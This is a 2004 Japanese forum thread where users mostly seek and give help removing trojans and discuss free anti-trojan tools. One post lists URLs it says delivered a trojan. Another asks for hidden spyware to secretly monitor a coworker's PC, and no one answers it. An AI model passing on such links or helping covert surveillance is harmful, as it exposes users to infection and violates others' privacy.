[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 901- 2chのread.cgiへ]
Update time : 03/05 07:04 / Filesize : 243 KB / Number-of Response : 984
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]

↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

☆☆トロイの木馬☆☆2台目

1 名前:名無しさん@お腹いっぱい。 mailto:sage [04/06/15 18:14]
トロイの木馬の現状とそれを取り巻く状況について語るスレです。

ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。

セキュリティー関係で質問ある方は下記へどうぞ。
ウィルス情報&質問 総合スレッド☆Part20
pc5.2ch.net/test/read.cgi/sec/1086098775/
セキュリティ初心者質問スレッドpart43
pc5.2ch.net/test/read.cgi/sec/1087093973/
エロサイト見てたら…助けてください! part28
pc6.2ch.net/test/read.cgi/pcqa/1086932629/

前スレ
☆☆トロイの木馬☆☆
pc5.2ch.net/test/read.cgi/sec/1052242064/
関連スレ
【フリー版】トロイ対策 a scuared 2【あり】
pc5.2ch.net/test/read.cgi/sec/1077204396/

263 名前:名無しさん@お腹いっぱい。 mailto:sage [04/08/28 02:59]
>>261 McAfee 使ってるんならそのまま駆除できないの?


264 名前:ウィルスに怯える名無し [04/08/28 03:09]
>>263
ウイルスチェックしたあとに駆除ができたのかなフリーで

だとしたら怠慢しすぎだな俺、ちょっといってきますノシ

265 名前:名無しさん@お腹いっぱい。 mailto:sage [04/08/28 14:43]
>>260
マジなら別のサイト逝け

騙りなら警察に逝け

266 名前:名無しさん@お腹いっぱい。 [04/08/28 16:26]
【大人の時間】ってとこの【スポーツ画像】のなかの
{【4:129】@大山加奈のエロ画像ぎぼ〜んんんんんんん@}の
━━━
117 :名無しさん@お腹いっぱい。 :04/08/28 05:02 ID:9/P+AUzi
拾い物ですが赤外線カメラもの・・・

raus.de/crashme
www.strangeworld.info/upload/upload.php
asongfor.s13.xrea.com/x/up/files/ayutan0661.jpg
picopico.dip.jp/ragnarok/data/1073724070984_log.jpg
wonderful.at/2ch
━━━
全部で五つあるうちの三つ目に逝ったらトロイの木馬と言うものが襲ってきて
McAfeeがVirusScanして感染したのを削除しました 
初心者なんでこれ以上わかりません
これで元の元気なパソコンになりますか?教えていただきたい

267 名前:名無しさん@お腹いっぱい。 mailto:sage [04/08/28 17:01]
>>266
ベタベタ貼り付けるな!

268 名前:名無しさん@お腹いっぱい。 [04/08/28 17:57]
downloader.trojanというウイルスがPC内に
いるのですが、除去できません。
どうしたらいいでしょうか。

269 名前:名無しさん@お腹いっぱい。 mailto:sage [04/08/28 18:01]
>>268
service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/jp_docid/20030926221125958
ねぇ、なんでそのウィルスを検出したソフトのスレッドで聞かないの?


270 名前:名無しさん@お腹いっぱい。 mailto:sage [04/08/28 18:04]
>>268
www.symantec.com/region/jp/sarcj/data/d/downloader.trojan.html#removalinstructions

271 名前:いなむらきよし [04/08/29 07:48]
奇形の木馬(^_^)



272 名前:名無しさん@お腹いっぱい。 mailto:sage [04/08/31 11:48]
誰かバカフィーがスルーするトロイ知らない?

273 名前:名無しさん@お腹いっぱい。 mailto:sage [04/08/31 12:47]
>>272
バカは氏ね。

274 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/01 10:32]
スタートアップフォルダを監視できるソフト知りませんか?
RegporotとTeatimerは見ていないようだし、SSMはちょっと大げさだし。
軽いやつあったら教えて下さい。

275 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/01 23:41]
>>274
www.mlin.net/StartupCPL.shtml

276 名前:275 mailto:sage [04/09/01 23:43]
スマン、監視とはちょっと違うかもしれないわ。

277 名前:274 mailto:sage [04/09/03 14:24]
>>276
ありがとう!紹介してくれたものの下にあった
StartupMonitorを試したらフォルダも監視してくれました。
www.mlin.net/StartupMonitor.shtml

Regprotと同じぐらい軽いです。どのエントリを見ているか
まだ不明ですが、TeaTimerの替わりに使ってみます。感謝!

278 名前:274 mailto:sage [04/09/03 14:51]
最初ちょっと迷ったので使う人に説明しておきますね。
これ、msiインストーラ使ってるんですがインストール
したあとにできるスタートメニューにあるショートカットは
なぜかStartupMonitorを終了させるリンクです。
実行ファイルは C:\WINDOWSにあるStartupMonitor.exeです(XPのばあい)。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に登録されてWindows起動時に常駐します。ダウンロードページに
説明がありますが、アンインストールはプログラムの追加と削除からできるようです。

279 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/05 11:26]
a2スレで出てたけどVer2.0くるみたい

280 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/05 18:42]
ノートン使ってるがトロイの木馬、韓国からのがずば抜けて多い。
ったく迷惑な…。

281 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/05 18:49]
韓国からメールがくるのか?
ワームじゃなくて?



282 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/08 02:03]
ウイルス踏んだのでリカバリし直したんですが、
どうもたまに挙動がおかしいかんじ・・・疑心暗鬼?

ウイルスソフトじゃ駄目ってのなら、具体的にどうすればスッキリした気分になれるでしょうか?


283 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/08 07:19]
ウィルスソフトはウィルス本体だろ
ダメに決まってるやん w


284 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/08 19:32]
>>283は天才児


285 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/08 21:44]
>>282
OS再インストール。

でもインストール中にウィルスにやられたりして。

286 名前:名無しさん@お腹いっぱい。 [04/09/12 15:57:37]
C:\Program Files\gikoNavi\Log\2ch\exam\1079958163.dat
がオンラインスキャンで出てきました orz

手動で削除するにはどうすれば良いですか?
ちなみにこのトロイはパスワードを送信するらしい もうだめぽ orz


287 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/12 16:06:20]
>>285
インストール中にはやられない
やられるのはネットに繋いでから

288 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/12 18:30:59]
ローカルとかLAN内とか

289 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/13 20:14:50]
>>286
誤検出の可能性は?
OpenJaneのログにノートンが過剰反応する話は結構有名だけど、それと同じだったりして

290 名前:名無しさん@お腹いっぱい。 [04/09/14 03:29:11]
マルチしてすみません。トロイのスレこっちだったので書き直します

ウィルスバスターのオンラインチェックで
C¥WINNT\downroadedPROGRAMFILES¥tl7000.DLLというファイルに
「TROJ_SOBIT.A」と言うトロイが感染していると出てきました、

しかし検索をかけても該当のファイルが出てきません
再度ウィルスチェックをかけると、ファイルはまだあることになっているのですが
どうしてでかわかる人いますか?

レジストリのいらない情報は下記により削除しています。
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SOBIT.A

291 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/14 04:07:22]
>>290
セーフモードでやってみてごらん



292 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/14 08:08:01]
>>290
検索にはオプション設定があるし、エクスプローラーにもフォルダオプションがある
あんたの設定がまずいから表示されない

293 名前:名無しさん@お腹いっぱい。 mailto:age [04/09/14 09:54:02]
今、セキュリティが!と反応してたので押してみたらトロイの木馬だった
アメリカからやられてた これまでも中国、韓国、フランスと来ている

294 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/14 12:53:20]
>>293
嫌だったら、ファイアーウォールくらい入れろよ

295 名前:ぼるじょあ ◆yBEncckFOU mailto:sage [04/09/14 13:00:19]
>>290
ActiveXコントロールの"中"に該当ファイルがあると思うよ

"Downloaded Program Files"フォルダを開いて、核ファイルの
プロパティ→依存関係をチェックする

該当ファイルが含まれているファイルを削除する

296 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/14 13:13:11]
>>290
わりぃ わりぃ
C:\WINDOWS\Downloaded Program Files
この中かよ
エクスプローラーでは全部見えないから
コマンドプロンプトで
cd C:\WINDOWS\Downloaded Program Files
dir これでフォルダの中が表示される
del 問題のファイルをフルパスで入力 /f

297 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/14 13:21:24]
スペースが途中に含まれているから
cd "C:\WINDOWS\Downloaded Program Files"
dir これでフォルダの中が表示される
del 問題のファイルを拡張子まで入力 /f

298 名前:290 mailto:sage [04/09/14 18:29:26]
ありがとう
プロパティで会社名が不明とか怪しいファイルをまとめて削除したら
消えました。
エクスプローラーでは見えないのですね

299 名前:ぼるじょあ ◆yBEncckFOU mailto:sage [04/09/14 19:09:57]
>>290
すでに解決ずみのようだけど、烏賊蛇足

ウィルスバスターオンラインスキャンで感染ファイル
が見つかった場合、パスが途切れて見えないことがある

上のつまみ(項目の境目)を右にスライドさせると
横スクロールバーが現れて、フルパスを確認できる

そうするとどのファイルが感染しているかがわかるので
対処が容易になる
(今回のケースでいうと感染ファイルはActiveXの実体)

またUSサイトのオンラインスキャンのほうが自動駆除
オプションが使えるので、対処が楽になるケースもあるので
おすすめ
ttp://housecall.trendmicro.com/


300 名前:名無しさん@お腹いっぱい。 [04/09/15 14:29:53]
トロイに感染したファイルが3つあって場所は
C:WINDOWS\SYSTEM\winnet.dll
C:WINDOWS\SYSTEM\run_dos.dll
C:WINDOWS\SYSTEM\rnr.dll

なのですが全て手動で削除してもかまわないものですか?
一応質問します。お願いします。

301 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/15 14:51:18]

 何も知らないんですね



302 名前:286 mailto:sage [04/09/15 15:03:30]
>>289
亀レスですが・・・みたいですね
他のソフト(a2/ewide)で確認しても出てこないし
一応心配なのでログは消しましたが、ありがとうございました

303 名前:名無しさん@お腹いっぱい。 [04/09/16 13:41:17]
緊急age

おまいら
pc5.2ch.net/test/read.cgi/sec/1060956936/の638を読んでください

ewidoもGDI+のバグの可能性ある


304 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/16 18:01:09]
SP2にすりゃいいんだろ

305 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/16 20:12:21]
>304
SP2のセキュリティーホールだべ

306 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/17 16:09:38]
>>303
なんでewidoに入ってるのか、解説キボン。

307 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/18 11:52:56]
>>306
ewidoが自分自身の描画用に使ってるんだろ。

308 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/23 07:33:12]
保守

309 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/23 22:30:10]
ewidoすげえ、まだノートンも正式対応してない苺キンタマに早くも対応済

310 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/24 00:05:00]
たまーに少しうpしてるところもかわいい(;´Д`)

311 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/24 15:12:07]
会社の同僚の女の子のPCをコソーリ覗きたいんですけど、
どんなスパイウェアがいいでつかね?

VNCはタスクトレイに表示が出ちゃうから
すぐバレちゃうし・・・




312 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/24 15:25:05]
a2うpまだ?

313 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/24 21:57:31]
a2検出力低いみたいだねぇ
漏れ入れてるからがんがってほしい

314 名前:  [04/09/26 06:47:40]
※PCウイルスが深刻化しています!!

headlines.yahoo.co.jp/hl?a=20040925-00000013-zdn_ep-sci
今すぐノートンウイルスソフトを購入されることを強くおすすめします!!
Norton Internet Security 2004 Professionl
pt.afl.rakuten.co.jp/c/0049f2c6.43316645/?url=http%3a%2f%2fwww.rakuten.co.jp%2fjib%2f810923%2f810924%2f825843%2f%23641840
シマンテック  ウイルス対策ソフト インターネットセキュリティ2004 Norton InternetSecurity
pt.afl.rakuten.co.jp/c/0047d0ca.5ad9afa3/?url=http%3a%2f%2fwww.rakuten.co.jp%2fjba%2f473599%2f475511%2f475523%2f%23523551
================================
デスクトップ画像をあぷろだにUpするトロイの木馬が出現
シマンテックは9月24日、P2Pソフト「Winny」を介して広まっているトロイの木馬
「Trojan.Upchan」に対する警告を発した(25日11時30分追記、一部改変:
シマンテックの情報では「Winny経由」となっていたが、実際にはWinnyとは関係なく、
本体は名前を変えながら複数のアップローダから配布されている模様だ。このファイルを実行してしまうと
PCに本体がコピーされ、デスクトップのスクリーンショットが8分おきに、一種の画像掲示板である
アップローダに公開されてしまう。
つまり、もしそのタイミングでメーラーを開いていれば自分のメールアドレスやメールの内容が、
Webブラウザを起動していれば閲覧しているWebページが、インスタントメッセンジャーを利用していれば
会話の内容が記録され、アップロードされてしまうことになる。既9月24日23時の時点では、このトロイの木馬に対応した定義ファイルを提供しているのはシマンテックのみの模様だ。同社製品を
利用している場合は早期のアップデートが望ましい。また、それ以外の製品を利用している場合は、リスクが伴うが
トロイの木馬本体(shellsystem.exe)の削除およびレジストリの削除によって復旧させることになる。
================================


315 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/26 08:47:33]
>>314
これって「卓上」って書いた奴のこと?

316 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/26 12:34:08]
常駐していたMcAfeeVirusScanで「Exploit-URLSpoof.gen」というトロイを検出しました。
場所はC:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5でした。
駆除ができなかったのでファイルごと削除したのですが、対応はこれだけで十分なのでしょうか?
ご意見よろしくお願いいたします。

317 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/26 13:20:33]
>>316
たぶん、ホームページを見て感染する種類のトロイだと思うよ
不安ならここのスレのものを入れてみるなり、SpybotやAd-awareなり
入れてみるなりしてみればいいと思うよ

318 名前:316 mailto:sage [04/09/26 17:14:31]
>>317

ご意見ありがとうございました。
McAfeeVirusScan、a2、Spybotでスキャンしたところ、特に検出されませんでした。
とりあえず一安心といったところです。

ところで「常駐」ということは感染したら即時に検出、に近いイメージが自分にはあります。
そこで「Exploit-URLSpoof.gen」が検出されたタイミングが非常に気になってます。
タブブラウザソフトについてた検索バーのグーグルであるキーワードを検索しようとしました。
その検索結果が表示された瞬間にMcAfeeVirusScanが「Exploit-URLSpoof.gen」を検出したんです。
念のため1回目の削除後にもう1回同じキーワードで検索したらまた反応しました。
その時は削除後のMcAfeeVirusScanでもう1つ「Exploit-URLSpoof.gen」を検出しました。
これってその検索結果表示のページに仕組まれてる可能性があるってことになるんでしょうか?

319 名前:あぼーん mailto:あぼーん [あぼーん]
あぼーん

320 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/26 18:59:18]
↑(ノ∀`*)プププ

321 名前:みー [04/09/26 21:11:22]
画像見ようとしてクリックしたらトロイの木馬が検出されましたとか表示されました!
あわてて電源きって再起動してインターネットしようとしたら、
最初のページが外国語のサイトになってしまいました。
本当わけわからなくて困ってます。
どうしたらいいでしょうか?




322 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/26 21:19:31]
>>321
"スパイウェア"で検索してわからなければパソコン修理に出せ。

323 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/26 21:19:42]
>>321
エロサイト見たら…助けて下さい!Part41
pc6.2ch.net/test/read.cgi/pcqa/1095834281/
ここのテンプレを、順番に全てやってみろ

324 名前:みー [04/09/26 21:49:59]
ありがとうございます。
試してみますが、私まだ高校生でコンピュータの知識があまりないんです。
だからもう少し詳しく教えてもらえませんか?
今からできる限りの事を試してみます。

325 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/26 21:51:40]
>>324
だから、そっちのスレにあるテンプレを全部試してみろって言ってるんだよ。
詳しく教えろだなんだって、お前まだ読んでもいないだろうが。
知識のあるなしと、テンプレ読む読まないは別だっての。勘違いするな。

326 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/26 21:56:25]
>>324
苺キンタマって知ってるか?おまいのような初心者が必ずやられる
恐ろしいウィルスだぞ。知識がないならパソコンの電源切れ。それだけで済む。

327 名前:みー [04/09/26 22:07:47]
すみませんでした。
再起動したらデスクトップに女の人のリンク画像みたいなものがでてきていました。。
今ウイルスのスキャン?みたいなものをしています。


328 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/26 22:16:26]
キンタマにやられた。直せねぇ つд`)

329 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/26 22:26:58]
ewidoでスパイウェアひっかかったw
初めてでうれしかったよぅ

330 名前:みー [04/09/26 22:27:56]
スキャンに時間がかかり、途中でキャンセルしました。
テンプレの方で、ウインドウズの「Me」はシステムの復元という方法もあると書いてあったので、
それを実行しました。
自動的に再起動して、デスクトップは普通に戻り、
インターネットの最初のページも普通に戻りました。
さっきは初めてのウイルスにびっくりしてしまい自己中な事書いてしまって本当すみません。
他のスレ紹介してくれた方もありがとうございました。
今後は気をつけます。
まだ直ってなかったらもう一度きます。

331 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/26 22:34:49]
>>330
システムの復元やっただけじゃ、ウィルスなりスパイウェアは中に入ったまま
(レジストリだけ元の状態に戻した、ってだけ)
テンプレは面倒くさがらずに全部やれ、質問は向こうのスレでやれ
こっちで聞くのはスレ違い



332 名前:名無しさん@お腹いっぱい。 [04/09/27 03:14:12]
あのーTROJ_PORNDIAL.BPにかかっちゃったみたいなんですが
トレンドマイクロのウィルスデータベースで調べて対処方やってみたんですが
何度もそのファイルを削除してるんですがまたすぐ復活してしまいます。
どうやれば完璧に消し去ることができるんでしょうか?(つд`)
インターネットやってる途中に勝手に国名聞いてくるやつが開いて
困ってます(;・∀・)対処方知ってたら教えてください(´;ω;`)

333 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/27 10:02:59]
>>332
おーえすはなに はてな


334 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/27 10:11:39]
>>332
ちゃらけた顔文字使って余裕たっぷりだな。
もっとせっぱ詰まってから来てまじめに書けよ。

335 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/27 12:03:35]
test

336 名前:名無しさん@お腹いっぱい。 [04/09/27 15:09:19]
OSはXPです。


337 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/27 15:12:06]
>>336
システムの復元を無効にしてる?
あとレジストリの修復は?

338 名前:名無しさん@お腹いっぱい。 [04/09/27 16:57:48]
ttp://www.symantec.com/region/jp/avcenter/venc/data/trojan.chost.html
↑Symantecでは「trojan.chost」と呼ばれているようですが、Trendmicroでの呼び方を教えた下さい。

339 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/27 17:14:37]
>>338
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_HOSTER.A
別名

340 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/27 17:35:06]
>>339
サンクスです。早速手動で削除してみます。

341 名前:名無しさん@お腹いっぱい。 [04/09/27 18:07:56]
>>337
システム復元無効にしてますが戻ってきます・・・
レジストリの修復もだめっぽいです。



342 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/27 19:24:05]
おい、馬鹿ども。
ここは質問スレじゃねぇ。
質問したい馬鹿も回答したい馬鹿も、どっか他所いってしろ。

343 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/27 21:30:00]
質問失礼します。
トロイの木馬対策のソフトをPCにインストールしたいのですが、
どの「アンチトロイソフト」をインストールすればいいのかが分かりません。
どなたかアドバイス頂けないでしょうか?
よろしくお願いします。

344 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/27 21:36:45]
>>343
お断りします。

345 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/27 21:42:51]
>>343
今のところ、対策としてはこれが無料で最強(無料)
■トロイ検出・駆除 ewido-Free
ttp://www.ewido.net/en/?section=download


346 名前:名無しさん@お腹いっぱい。 [04/09/27 22:09:24]
>>345
これ今日入れたんだけど常駐するの?
アイコンがタスクバーにあるんだけど…
これって常駐してるって事じゃないの?
フリーは常駐しないんだよね
なんかよく分からない(´・ω・`)

347 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/27 22:14:23]
とりあぜずスレ全部読め
300くらいなら数分
わかんないところあったら教える

348 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/27 22:29:54]
数分〜300秒
1秒/スレ

349 名前:345 [04/09/27 23:05:17]
>>347
二週間したら常駐しなくなるんだ
苺キンタマ対応って聞いたから入れてスキャンしたら
違うトロイが見つかった(´・ω・`)ハゥ…

350 名前:名無しさん@お腹いっぱい。 [04/09/27 23:06:33]
間違えた346です

351 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/27 23:14:00]
できればa2+ewidoが(・∀・)イイ!!



352 名前:かわうそ mailto:sage [04/09/28 08:06:41]
ここで丁寧に教えても道であったら笑うんだろう?

353 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/28 19:56:46]
PFWでIEをブロックにしてもトロイは防げないの?


354 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/28 23:40:53]
感染してればね

355 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/29 00:30:59]
>>353
ログを見ていれば気がつくだろ


356 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/29 00:35:08]
そんなに頻繁に見たりしない

357 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/29 01:49:02]
ewidoのスキャンって、トロイ見付ける度に止まってる?
クッキーごとに確認求められて、めんどい

358 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/29 03:04:26]
お前が馬鹿だからだろ。

359 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/29 05:40:31]
馬鹿って言う奴が馬鹿

360 名前:名無しさん@お腹いっぱい。 [04/09/29 08:42:46]
馬鹿って言う奴が馬鹿って言う奴が馬鹿

361 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/29 10:37:41]
急にフォレストガンプが見たくなった



362 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/29 10:44:30]
1スレ目とエライ違いだな。なんなんだこいつらは。

363 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/29 11:26:57]
>>362
苺キンタマで、Ewidoが注目されたから厨房が流れて来てるんだろうよ

364 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/29 12:20:14]
馬鹿って言う奴が馬鹿って言う奴が馬鹿って言う奴が馬鹿

365 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/29 21:10:05]
(・∀・)ノ チューボーカエレ

366 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/29 22:43:20]
ewido入れてみました。
常駐していません。

アンチトロイソフトが常駐していると、常駐時にはどのような作動が行われているのでしょうか?
あと、ewidoと併用した方がよいアンチトロイソフトがありましたら教えてください。

367 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/29 22:51:27]
>>366
a2

368 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/29 23:18:47]
ewido金出せば常駐するYo

369 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/30 00:14:30]
14日間は常駐するだろ。インストール時にチェックはずしたか?
Additionalのinstall guardで常駐するんじゃね?

370 名前:名無しさん@お腹いっぱい。 [04/09/30 13:41:42]
ewido入れて2日
相当重いのでタスク調べたらcpuが100になってました
消したら元に戻りました

371 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/30 14:59:01]
a2うpだてするとエラーが出る(´・ω・`)



372 名前:名無しさん@お腹いっぱい。 [04/09/30 15:50:56]
今のところフリーで常駐してくれるやつはないってことですかね

373 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/30 16:31:05]
ない
つーかこの会話読んでて分からんの?

374 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/30 17:20:53]
IMEをタスクバーに入れる設定をしているんだが、ewidoが動くとなぜかIMEが
タスクバーから外れて画面表示されるんだが、同様の現象ありませんか?
XP Pro SP2です。

375 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/30 18:17:36]
エラーはうpだての前触れだったかw

Downloading Signature database update 09/29/2004 ...
Added detection for Worm.Win32.Bagle.as

376 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/30 18:19:44]
>>374
同じく。トロイの検知機構が、隠す仕組を奪うんだろうね。

377 名前:374 mailto:sage [04/09/30 20:19:24]
>>376
にゃるほど。サンクスコ。

378 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/30 22:11:37]
なんか15分前位の数分間、ノートンセキュで

NetBusトロイの木馬を使ってローカルコンピュータに接続しようとする試みを遮断しました。

と14件ほど、急に検出しまくってた・・・



379 名前:名無しさん@お腹いっぱい。 mailto:sage [04/09/30 23:37:01]
>>378
outpostのログ見ると、
23時から10分程度の間に
ポート1023と5554に10件、通信の要求が来てる。

ポート番号からググって見たら、sasserとかDabber.Bとかのせいらしい。


380 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/01 09:55:40]
質問です。
ewidoの終了の仕方が分かりません。プロセス終了させようとしても、アクセス拒否されます。
ZAとかは、右クリックに終了メニューがあるんですが…。

ちなみに、終了方法をぐぐっていたところ、

セキュリティ初心者質問スレッドpart47
pc5.2ch.net/test/read.cgi/sec/1095637802/
201 名前:名無しさん@お腹いっぱい。[] 投稿日:04/09/26 08:15:42
ewidoの終了の仕方がわからないです。どうすればいいですか?

と言うのを発見してこちらに来たんですが、質問もされてないようですし、当然回答もないようです。

381 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/01 11:48:09]
>>380
Win起動時に常駐されると終了できないみたいなので、
msconfigでスタートアップから外しておいて再起動する。
常駐させていなくても右クリックスキャンはできるみたい。




382 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/01 14:06:10]
んなアフォな。

383 名前:380 mailto:sage [04/10/01 15:33:04]
>>381
ありがとうございます。
msconfigのスタートアップ見ましたが、ないようでした。再起動すると、現れるのかな。

1度でも実行すると、終了できない感じですね。
なんか、イヤーな動きです。xeroxフォルダかいな。

384 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/01 16:17:56]
>>383
スタートアップじゃなくてサービスのところだった。
もう一度見てください。

385 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/01 16:19:56]
>383
サービスに項目あるよ

386 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/01 16:49:11]
トロイって驚くほどよくできてるだろ。
中にはアンチウイルスソフトやFWを無効化させるものまである。
だから終了できないくらいのほうがいいんじゃないか。

387 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/01 16:57:49]
サービスで動いているならサービスを停止すればいいだけ

388 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/01 17:06:58]
ウpダテきたね。あの「ポワッ」て音が可愛くて好き。

389 名前:380=383 mailto:sage [04/10/01 17:39:30]
>>384 >>385
thx。ありました!

390 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/01 23:35:50]
ewidoうpだて先変わった?
213.239.195.138→217.172.187.213

391 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/02 01:00:06]
>>378-379
今夜もお盛んな模様(´д`;



392 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/06 22:26:32]
ギシギシアンアン

393 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/11 05:04:59]
マジでどなたか a2 and ewido スレたててくれんかのぉ…

394 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/11 05:10:01]
EwidoEwidoうるさいあほが増えてこのスレの価値がめっさおちたわぁ〜

395 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/11 09:38:32]
【フリー版】トロイ対策 a scuared 2【あり】
pc5.2ch.net/test/read.cgi/sec/1077204396/l50 は無視ですかそうですか

396 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/11 17:01:17]
スレに価値もクソもあるかよ(・A・)

397 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/12 01:44:23]
>>1読めばわかるんだが、本来このスレは
トロイの木馬の現状とそれを取り巻く状況について語るスレ、であって
トロイ対策ソフトを語るスレじゃないんだよな。
危機意識を持つのはいいことなんだが、
ソフトを導入してお終いじゃあ、かえって深い傷を受けることになるよ。

398 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/12 02:27:04]
キンタマ対応で寄ってきた蛆虫厨房だらけだろ?
こいつらのレベルが低いのは必然なのさ。

399 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/12 05:40:42]
             ,イ    │
          //      |:!
            //,. -/r‐- 、| !
         /,/ ./ |  _」 ト、
       /.\`/  |二...-┘ ヽ
.        i   ,.>、;/ー- 、    l
       ! ∠.._;'____\   |
      ,!イ く二>,.、 <二>`\.、ヽ.
     /'´レ--‐'ノ. `ー---- 、 |\ ヽ、
    \  `l  (!"      Jfヽ!  `''-;ゝ
      `‐、jヽ ヾニニ>   ゙イ" }_,,. ‐''´
         `´\  ー   / ,ィ_}
.          |_ `ー ''´ _」'
        _,.| ~||「  ̄ 人|、._
  ,r==;"´  ヽ ミ|||彡   / ` ー`==、-、
. ///,イ  ___ ヽ|||_,,. ‐''´___  | | | |ヽ

  ホワイトベースはコナミの登録商標です

400 名前:名無しさん@お腹いっぱい。 mailto:sage [04/10/12 06:43:13]

             ぐ''ー 、                          ぐ'''ー、
                 |  .〔.. ---、                       !  .| .,,,,
         ,,.. -‐'''"゛   ._..-‐'"                       |  `゙´ `''>
         `"''フ" _,,....  ̄´゙ヽ                        !  .|゙^''''"´
            /. ,..‐,゙,,,,,..ヾ .┴-―ー''''''''ー 、          _、 ._,,,..ゝ !'ニニ冖''ー、
      _,,,.. -┘ _,二-ー¬''''''''''''''''''''―-- ....,,,,./         │´ i.. ‐''"゛  │  .!
   .゙' ̄ ._,, ‐'"´ _,, -ー'''''二二ミ゙'''‐、                 |  .|.. -‐'''"´゙'r !  l
     ´   ! ゙'"∠.. -、 .ゝ--、 /  ,!               l  ./';;jl ‐''"  |  .!
            l  ゙i,i;;;;;;′  / ,i′ /                  !  ミ -‐''"゛../ . !  |
